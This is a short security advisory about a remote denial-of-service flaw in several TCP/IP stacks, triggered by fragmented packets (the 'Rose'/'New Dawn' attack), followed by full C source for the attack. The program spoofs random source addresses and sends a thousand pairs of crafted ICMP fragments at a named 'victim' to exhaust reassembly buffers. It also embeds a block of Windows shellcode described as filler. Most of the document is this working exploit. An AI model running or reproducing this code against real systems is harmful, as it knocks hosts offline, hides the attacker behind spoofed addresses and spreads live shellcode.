// source: https://www.securityfocus.com/bid/11258/info
Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability.
The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets.
The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack".
A remote attacker may exploit this vulnerability to deny service to an affected computer.
Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected./***
ROSE attack (chuck (at) lemure.net)
Discovered by:
gandalf@digital.net
code modified from large IGMP attack by:
Kox by Coolio (coolio@k-r4d.com)
Sends out first and last ICMP packet echo request.
Reportedly works for TCP / UDP as well, since this is
a IP layer attack.
Eats up all available packets for fragmentation reassembly.
***//* just a thousand kills win XP */#define NUM_PACKETS 1000#include<stdio.h>#include<unistd.h>#include<stdlib.h>#include<netdb.h>#include<string.h>#include<errno.h>#include<pwd.h>#include<time.h>#include<sys/types.h>#include<sys/socket.h>#include<sys/utsname.h>#include<netinet/in.h>#include<netinet/ip.h>#include<netinet/ip_icmp.h>#include<netinet/ip_icmp.h>/* Figured I try sending some shell code for my random payload...
doesn't do anything
*/char code[]="\xe8\x38\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xe5\x49\x86""\x49\xa4\xad\x2e\xe9\xa4\x1a\x70\xc7\xd9\x09\xf5\xad\xcb\xed\xfc""\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2\x73\xad\xd9\x05\xce\x72\xfe\xb3""\x16\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c\x00\x01\x5b\x54\x89""\xe5\x89\x5d\x00\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c""\xad\x8b\x58\x08\xeb\x0c\x8d\x57\x2c\x51\x52\xff\xd0\x89\xc3\x59""\xeb\x10\x6a\x08\x5e\x01\xee\x6a\x0a\x59\x8b\x7d\x00\x80\xf9\x06""\x74\xe4\x51\x53\xff\x34\x8f\xe8\x90\x00\x00\x00\x59\x89\x04\x8e""\xe2\xeb\x31\xff\x66\x81\xec\x90\x01\x54\x68\x01\x01\x00\x00\xff""\x55\x20\x57\x57\x57\x57\x47\x57\x47\x57\xff\x55\x1c\x89\xc3\x31""\xff\x57\x57\x68\x02\x00\x22\x11\x89\xe6\x6a\x10\x56\x53\xff\x55""\x18\x57\x53\xff\x55\x14\x57\x56\x53\xff\x55\x10\x89\xc2\x66\x81""\xec\x54\x00\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\x89\xd7\xc6""\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x7c\x24\x48\x89\x7c\x24\x4c""\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49""\x51\x51\xff\x75\x00\x51\xff\x55\x30\x89\xe1\x68\xff\xff\xff\xff""\xff\x31\xff\x55\x2c\x57\xff\x55\x0c\xff\x55\x28\x53\x55\x56\x57""\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18""\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc""\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c""\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c""\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d""\x5b\xc2\x08\x00";voidusage(char*arg){printf("Rose attack\n");printf("Usage: %s <victim> [source]\n", arg);printf("If source not specified, will send out from random ip's\n");exit(1);}unsignedintrandip(){struct hostent *he;struct sockaddr_in sin;char*buf =(char*)calloc(1,sizeof(char)*16);sprintf(buf,"%d.%d.%d.%d",(random()%191)+23,(random()%253)+1,(random()%253)+1,(random()%253)+1);returninet_addr(buf);}unsignedshortin_cksum(unsignedshort*buh,int len){registerlong sum =0;unsignedshort oddbyte;registerunsignedshort answer;while(len >1){
sum +=*buh++;
len -=2;}if(len ==1){
oddbyte =0;*((unsignedchar*)&oddbyte)=*(unsignedchar*)buh;
sum += oddbyte;}
sum =(sum >>16)+(sum &0xFFFF);
sum +=(sum >>16);
answer =~sum;return answer;}introse(struct sockaddr_in *victim,unsignedlong src){int SMALLICMP =1000;unsignedchar*pkt;struct iphdr *ip;struct igmphdr *igmp;struct icmphdr *icmp_pkt;struct utsname *un;struct passwd *p;int i, s,j;int id =(random()%40000)+500;
pkt =(unsignedchar*)calloc(1, SMALLICMP);
ip =(struct iphdr *)pkt;
icmp_pkt =(struct icmphdr *)(pkt +sizeof(struct iphdr));
ip->version =4;
ip->ihl =(sizeof*ip)/4;
ip->ttl =255;
ip->tot_len =htons(SMALLICMP);
ip->protocol =1;
ip->id =htons(id);
ip->frag_off =htons(IP_MF);
ip->saddr = src;
ip->daddr = victim->sin_addr.s_addr;
ip->check =in_cksum((unsignedshort*)ip,sizeof(struct iphdr));
icmp_pkt->type = ICMP_ECHO;
icmp_pkt->code =0;
icmp_pkt->checksum =1000;
icmp_pkt->un.echo.id =random()%255;
icmp_pkt->un.echo.sequence =random()%255;for(i =sizeof(struct iphdr)+sizeof(struct icmphdr)+1;
i < SMALLICMP; i++){//pkt[i] = random() % 255;
pkt[i]='\x00';}
j=0;for(i=sizeof(struct iphdr)+sizeof(struct icmphdr)+500;
i <sizeof(struct iphdr)+sizeof(struct icmphdr)+500+356;
i++){
pkt[i]= code[j];
j++;}if((s =socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0){perror("error: socket()");return1;}if(sendto(s, pkt, SMALLICMP,0,(struct sockaddr *)victim,sizeof(struct sockaddr_in))==-1){perror("error: sendto()");return1;}/* big frag at end... */
ip->frag_off =htons(8100);//ip->frag_off = htons(8100 | IP_MF);sendto(s, pkt, SMALLICMP,0,(struct sockaddr *)victim,sizeof(struct sockaddr_in));free(pkt);close(s);usleep(1000);return0;}intmain(int argc,char*argv[]){struct sockaddr_in victim;struct hostent *he;unsignedlong source;int i;srandom(time(NULL));if(argc <2)usage(argv[0]);if((he =gethostbyname(argv[1]))==NULL){herror(argv[1]);exit(1);}if(argc >2){
source =inet_addr(argv[2]);}else{
source =randip();}memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length);
victim.sin_port =htons(0);
victim.sin_family = PF_INET;printf("Sending ICMP fragments: ");fflush(stdout);for(i =0; i < NUM_PACKETS; i++){rose(&victim, source);if(argc <3){
source =randip();}printf("%d\n", i);fflush(stdout);}printf("\nDONE\n");fflush(stdout);}